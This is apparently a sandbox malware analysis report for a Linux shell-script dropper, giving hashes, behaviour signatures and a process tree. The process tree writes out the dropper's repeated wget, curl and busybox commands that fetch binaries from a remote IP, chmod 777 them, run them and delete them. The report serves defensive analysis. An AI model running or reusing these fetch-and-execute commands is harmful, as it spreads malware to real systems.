Analysis
-
max time kernel
16s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
01-11-2024 02:29
Static task
static1
Behavioral task
behavioral1
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
-
Size
10KB
-
MD5
abfaa07509a98cf9d61a9ee03366064b
-
SHA1
29b8aa70ebe761df31582b1b62505f786b247305
-
SHA256
2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29
-
SHA512
f075902543aeb6d5a01e97c8cde8c65e59b945c859a7b846c14d98263366506322b3b33a50f3dba6f4ab67698396cf4e90cf9ab26835c00dce9124844ed97329
-
SSDEEP
192:qJBElpvTXslVFDTABtsvA9tovAEdXjJJBElp9TXslVjVDTABtKy:8DTABtsvAHovAEdXjBDTABtKy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1526 chmod 1616 chmod 1634 chmod 1550 chmod 1562 chmod 1640 chmod 1646 chmod 1520 chmod 1628 chmod 1544 chmod 1574 chmod 1598 chmod 1604 chmod 1610 chmod 1622 chmod 1538 chmod 1592 chmod 1664 chmod 1568 chmod 1586 chmod 1652 chmod 1658 chmod 1508 chmod 1532 chmod 1556 chmod 1580 chmod 1514 chmod 1670 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw 1509 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw /tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 1515 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 /tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px 1521 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px /tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj 1527 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj /tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc 1533 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc /tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch 1539 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch /tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT 1545 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT /tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa 1551 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa /tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE 1557 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE /tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo 1563 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo /tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 1569 tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 /tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u 1575 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u /tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD 1581 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD /tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ 1587 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ /tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 1593 tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 /tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u 1599 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u /tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD 1605 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD /tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ 1611 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ /tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw 1617 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw /tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 1623 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 /tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc 1629 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc /tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch 1635 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch /tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT 1641 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT /tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa 1647 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa /tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE 1653 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE /tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo 1659 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo /tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px 1665 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px /tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj 1671 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1545 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT 1546 rm 1641 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT 1642 rm 1542 curl 1543 busybox 1638 curl 1639 busybox 1541 wget 1637 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw curl File opened for modification /tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px curl File opened for modification /tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT curl File opened for modification /tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa curl File opened for modification /tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo curl File opened for modification /tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD curl File opened for modification /tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ curl File opened for modification /tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw curl File opened for modification /tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch curl File opened for modification /tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj curl File opened for modification /tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj curl File opened for modification /tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT curl File opened for modification /tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo curl File opened for modification /tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc curl File opened for modification /tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u curl File opened for modification /tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 curl File opened for modification /tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 curl File opened for modification /tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch curl File opened for modification /tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE curl File opened for modification /tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8 curl File opened for modification /tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa curl File opened for modification /tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px curl File opened for modification /tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc curl File opened for modification /tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD curl File opened for modification /tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1 curl File opened for modification /tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ curl File opened for modification /tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u curl File opened for modification /tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE curl
Processes
-
/tmp/2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh/tmp/2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh1⤵PID:1500
-
/bin/rm/bin/rm bins.sh2⤵PID:1501
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:1502
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Writes file to tmp directory
PID:1506
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:1507
-
-
/bin/chmodchmod 777 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- File and Directory Permissions Modification
PID:1508
-
-
/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw./ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Executes dropped EXE
PID:1509
-
-
/bin/rmrm ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:1510
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:1511
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:1513
-
-
/bin/chmodchmod 777 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1./h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:1516
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:1519
-
-
/bin/chmodchmod 777 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px./FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px2⤵PID:1522
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:1525
-
-
/bin/chmodchmod 777 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj./EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj2⤵PID:1528
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:1529
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:1531
-
-
/bin/chmodchmod 777 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc./11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:1534
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:1535
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:1537
-
-
/bin/chmodchmod 777 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch./Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:1540
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:1541
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:1543
-
-
/bin/chmodchmod 777 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT./K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1545
-
-
/bin/rmrm K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:1546
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:1547
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:1549
-
-
/bin/chmodchmod 777 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa./weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa2⤵PID:1552
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:1553
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:1555
-
-
/bin/chmodchmod 777 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE./E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE2⤵PID:1558
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:1559
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:1561
-
-
/bin/chmodchmod 777 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo./k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵
- Executes dropped EXE
PID:1563
-
-
/bin/rmrm k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo2⤵PID:1564
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:1565
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:1567
-
-
/bin/chmodchmod 777 tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8./tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:1570
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:1571
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:1573
-
-
/bin/chmodchmod 777 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u./RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:1576
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:1577
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:1579
-
-
/bin/chmodchmod 777 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD./SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:1582
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:1583
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:1585
-
-
/bin/chmodchmod 777 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ./ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:1588
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:1589
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:1591
-
-
/bin/chmodchmod 777 tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8./tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm tDzQkhNshKptEsPA3ltf516QgABeKEiBY82⤵PID:1594
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:1597
-
-
/bin/chmodchmod 777 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u./RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u2⤵PID:1600
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:1603
-
-
/bin/chmodchmod 777 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD./SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm SC3qKbILRW2hWzlMHFetryS3VaErrO79PD2⤵PID:1606
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:1609
-
-
/bin/chmodchmod 777 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ./ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ2⤵PID:1612
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:1613
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:1615
-
-
/bin/chmodchmod 777 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw./ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw2⤵PID:1618
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:1619
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:1621
-
-
/bin/chmodchmod 777 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1./h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW12⤵PID:1624
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:1627
-
-
/bin/chmodchmod 777 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc./11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc2⤵PID:1630
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:1633
-
-
/bin/chmodchmod 777 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch./Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch2⤵PID:1636
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
PID:1637
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1638
-
-
